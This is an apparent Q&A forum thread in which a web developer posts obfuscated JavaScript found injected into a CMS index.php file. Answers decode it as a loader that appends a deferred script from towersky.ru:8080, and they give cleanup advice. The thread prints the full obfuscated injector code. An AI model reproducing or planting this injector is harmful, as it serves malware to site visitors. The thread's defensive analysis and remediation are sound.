tags:

views:

221

answers:

4
+7  Q: 

Weird Javascript in Template. Is this a hacking attempt?

I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script...

What is this javascript doing? I need to explain the specific dangers to my client.




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
                Fp=VU[u](A);
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo');
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0];
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp);
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y;
    cU=["Yr","gv"];
+13  A: 

Yes. The site has been compromised.

What you need to do is:

  1. Ensure that everyone who had access to those passwords run an updated virusscan on computers that they may have logged into the site from.
  2. Ensure that you change all login and admin passwords.
  3. If possible you should likely revert to the codebase as it was prior to you coming across this.
  4. Check the modification time of the script where you found this snippet (if it isn't too late) and look for other files that have been changed around that time. The script is likely randomly generated so grepping for parts of it is unlikely to be conclusive.

If this script was able to find its way in, then so can others. It is not uncommon that web sites are compromised via keylogging trojans on the computers of those who log into them.
See http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

unomi  2010-06-10 23:56:45
Thanks for the tips. The only files modified around that time were the index.php file for expression engine and two old index.htm files that were used for a previous design of the site. Apparently, they target index files? I'll pass these suggestions on and hopeful prevent disaster before it's too late!
Julian  2010-06-11 00:55:56
My most recent update was <script type="text/javascript"> $(document).ready(function() { document.title = 'New Title'; });</script>Do you think this might something to do with it?
Julian  2010-06-11 01:04:38
No, in order for the script to have been embedded in the manner that it was, the server itself had to have been compromised. Either they found an exploit to gain write access on the server or they were able to get login credentials either thru weak passwords, dumb luck or trojans.
unomi  2010-06-11 01:23:12
+4  A: 

The script basically adds the following line to your closing body tag:

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"&gt;&lt;/script&gt;

So, its trying to load an external script onto your site. I'm not sure what this script does - but no doubt its not anything nice.

Additionally, a quick search of "towersky.ru" on google reveals lists of malicious websites containing this site.

 2010-06-11 00:14:55
I think the guys at towersky.ru might be on a very noble mission here. The included script is named "speedtest.net.php", so maybe they are just trying to inject this script in all web pages around the world and if you're site is running slow, they'll just call up and inform you about it.
Anurag  2010-06-11 01:57:34
That's fair enough, but have you really got proof of that. Besides, if somebody injected code like that onto my site, clearly without permission, I wouldn't be too happy. Also why was such an effort made to mask what the script does? The use of "google.com" and "depositfiles.com" makes it even more suspicious - it tries to make it appear as if the code is from Google.
 2010-06-11 12:28:28
+8  A: 

The above code writes some code which activates code on the Russian site (http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php), which adds an invisible DIV containing an iFrame, which I assume contains a picture of a puppy.

Seth  2010-06-11 00:15:02
You are correct fine sir. Puppies.
Thqr  2010-06-11 00:45:33
+1  A: 

Considering I couldn't even load this page in Windows because my AV stopped me, yes, its a virus.

TheLQ  2010-06-11 15:38:10

related questions

Encryption in C# Web-Services
How Do You Secure database.yml?
ASP.NET LocationProvider
What do you (or your company) use for wiping a machine?
Can a proxy server cache SSL GETs? If not, would response body encryption suffice?
Java: What is the best way to SFTP a file from a server
How do I call a Flex SWF from a remote domain using Flash (AS3) ?
Best way to store a database password in a startup script / config file?
Using VM to get around VPN restrictions
Best references for secure coding practices in ASP.NET and classic ASP.
Secure Memory Allocator in C++
Resolving Session Fixation in JBoss
Best Practices for securing a REST API / web service
Defensive programming
Personal Linux web server
Block user access to internals of a site using HTTP_REFERER
Is there an Unobtrusive Captcha for web forms?
My website got hacked... What should I do?
What all do I need to escape when sending a (My)SQL query?
How do you disable browser Autocomplete on web form field / input tag?
Best .NET obfuscation tools/strategy
Are there best practices for testing security in an Agile development shop?
What is the best way to avoid SQL injection attacks?
Found a critical bug, but the company doesn't care
PHP Session Security